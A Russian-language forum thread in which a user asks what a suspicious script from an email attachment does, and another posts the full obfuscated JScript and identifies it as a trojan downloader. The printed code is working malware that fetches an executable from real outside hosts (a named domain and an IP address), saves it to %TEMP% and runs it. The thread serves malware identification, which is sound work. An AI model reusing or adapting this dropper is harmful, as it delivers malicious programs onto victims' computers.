Скрипт / Java

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / Java [игнор отключен] [закрыт для гостей] / Скрипт

4 сообщений из 4, страница 1 из 1

Скрипт

#39125587

PaulWist

Участник

Сообщения: 2 607

Рейтинг: 0 / 0

Братцы, помогите разобраться чЁ хочет скрипт-троян (насколько он "безобиден" ), ... приходит как аттач zip-архива на почтовый сервер.

Выкладываю его текст в сообщении как txt-файл, если надо могу выложить в теле сообщения.

...

Рейтинг:

0 / 0

11.12.2015, 10:22

| Ответить | Цитировать | Написать

Скрипт

#39125602

Blazkowicz

Участник

Сообщения: 25 080

Рейтинг: 0 / 0

Такое очучение, что других форумов кроме Java нет. Чего только не спрашивают.
Вот такой там скрипт запускается: Пытается скачать какой-то exe-шник и запустить.

Код: javascript

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.

var E = "softextrain64.com/86.exe? 46.151.52.196/86.exe? ? ?".split(" ");
var kvd = ((1/*r7Dr463629596n448324uM354193eOiZ*/) ? "WScri" : "") + "pt.Shell";
var Fi = WScript.CreateObject(kvd);
var Ce = "%TEMP%\\";
var dQD = Fi.ExpandEnvironmentStrings(Ce);
var GjZ = "2.XMLH";
var ukN = GjZ + "TTP";
var Cp = true, KVpF = "ADOD";
var nm = WScript.CreateObject("MS" + "XML" + (511519, ukN));
var kaM = WScript.CreateObject(KVpF + "B.St" + (72710, "ream"));
var WFE = 0;
var B = 1;
var gTaUUaj = 194813;
for (var j = WFE; j < E.length; j++) {
    var Tv = 0;
    try {
        poi = "GET";
        nm.open(poi, "http://" + E[j] + B, false);
        nm.send();
        if (nm.status == 779 - 579) {
            kaM.open();
            kaM.type = 1;
            kaM.write(nm.responseBody);
            if (kaM.size > 16575 - 212) {
                Tv = 1;
                kaM.position = 0;
                kaM.saveToFile/*uQi927B2AT*/(dQD/*l69w15w1MX*/ + gTaUUaj + ".exe", 4 - 2);
                try {
                    if (((new Date()) > 0, 7915459888)) {
                        Fi./*d995853FIVo*/Run(dQD + gTaUUaj + /*ZFx670u5BN*/".exe", /*qReb35f8A1*/3 - 2, 0);
                        break;
                    }
                } catch (Nc) {
                }
                ;
            }
            ;
            kaM.close();
        }
        ;
        if (Tv == 1) {
            WFE = j;
            break;
        }
        ;
    } catch (Nc) {
    }
    ;
}
;

Судя по всему, для IE эксплоит
https://msdn.microsoft.com/en-us/library/at5ydy31(v=vs.84).aspx

...

Рейтинг:

0 / 0

11.12.2015, 10:37

| Ответить | Цитировать | Написать

Скрипт

#39125608

Blazkowicz

Участник

Сообщения: 25 080

Рейтинг: 0 / 0

авторThe malware is known as Trojan.Win32.Swizzor.1!O, HEUR/QVM10.1.Malware.Gen or Mal/Wonton-BX.
По softextrain64.com легко найти описание вируса

...

Рейтинг:

0 / 0

11.12.2015, 10:40

| Ответить | Цитировать | Написать

Скрипт

#39125646

PaulWist

Участник

Сообщения: 2 607

Рейтинг: 0 / 0

BlazkowiczавторThe malware is known as Trojan.Win32.Swizzor.1!O, HEUR/QVM10.1.Malware.Gen or Mal/Wonton-BX.
По softextrain64.com легко найти описание вируса

Большое русское мерси!!! :)

PS сами мы не местные в js не понимаем вАще .

Ещё раз, большое спасибо!

...

Рейтинг:

0 / 0

11.12.2015, 11:12

| Ответить | Цитировать | Написать

4 сообщений из 4, страница 1 из 1

Форумы / Java [игнор отключен] [закрыт для гостей] / Скрипт

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=59&msg=39125608&tid=2124567]:	0ms
get settings:	10ms
get forum list:	17ms
check forum access:	3ms
check topic access:	3ms
track hit:	146ms
get topic data:	9ms
get forum data:	2ms
get page messages:	46ms
get tp. blocked users:	2ms
others:	243ms

total:	481ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы